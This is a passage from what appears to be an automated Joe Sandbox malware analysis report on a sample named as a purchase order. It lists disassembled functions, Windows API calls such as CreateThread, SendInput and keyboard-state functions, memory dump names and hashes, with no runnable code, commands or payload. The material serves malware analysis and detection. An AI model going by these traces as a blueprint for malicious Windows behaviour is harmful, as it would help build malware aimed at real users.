                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                  • String ID:
                                  • API String ID: 1422014791-0
                                  • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                  • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                  • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                  • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                  Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetClientRect.USER32(?,?), ref: 004302E6
                                  • GetWindowRect.USER32(00000000,?), ref: 00430316
                                  • GetClientRect.USER32(?,?), ref: 00430364
                                  • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                  • GetWindowRect.USER32(?,?), ref: 004303C3
                                  • ScreenToClient.USER32(?,?), ref: 004303EC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                  • String ID:
                                  • API String ID: 3220332590-0
                                  • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                  • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                  • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                  • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                  Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _malloc_wcslen$_strcat_wcscpy
                                  • String ID:
                                  • API String ID: 1612042205-0
                                  • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                  • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                  • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                  • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                  Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove_strncmp
                                  • String ID: >$U$\
                                  • API String ID: 2666721431-237099441
                                  • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                  • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                  • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                  • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                  Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044C570
                                  • SetKeyboardState.USER32(00000080), ref: 0044C594
                                  • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                  • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                  • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$InputSend
                                  • String ID:
                                  • API String ID: 2221674350-0
                                  • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                  • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                  • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                  • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                  Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcscpy$_wcscat
                                  • String ID:
                                  • API String ID: 2037614760-0
                                  • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                  • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                  Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                  • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                  • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                  • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                  • String ID:
                                  • API String ID: 960795272-0
                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                  Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                  Download Yara Rule
                                  APIs
                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                  • EndPaint.USER32(?,?), ref: 00447D13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                  • String ID:
                                  • API String ID: 4189319755-0
                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                  Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                  • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                  • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                  • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                  • 742845F0.USER32(?,000000F0,?,00001024,00000000,00000000,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490D4
                                  • 742859E0.USER32(?,000000F0,00000000,?,000000F0,?,00001024,00000000,00000000,?,0000111E,00000000,00000000,?,00000409,00000000), ref: 004490E1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$742845742859InvalidateRect
                                  • String ID:
                                  • API String ID: 3483730924-0
                                  • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                  • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                  Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$Show$Enable$MessageSend
                                  • String ID:
                                  • API String ID: 642888154-0
                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                  Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$Enable$Show$MessageSend
                                  • String ID:
                                  • API String ID: 1871949834-0
                                  • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                  • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                  • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                  • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                  Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                  Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                  • 6FDA2980.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                  • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                  • 6FD9C400.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                  • SendMessageW.USER32 ref: 00471AE3
                                  • DestroyCursor.USER32(?), ref: 00471AF4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$A2980C400CursorDestroyExtractIcon
                                  • String ID:
                                  • API String ID: 2591440241-0
                                  • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                  • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                  • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                  • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                  Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285DeleteObject$CursorDestroyMoveWindow
                                  • String ID:
                                  • API String ID: 3700930721-0
                                  • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                  • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                  • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                  • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                  Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • _wcslen.LIBCMT ref: 004438CD
                                  • _wcslen.LIBCMT ref: 004438E6
                                  • _wcstok.LIBCMT ref: 004438F8
                                  • _wcslen.LIBCMT ref: 0044390C
                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                  • _wcstok.LIBCMT ref: 00443931
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
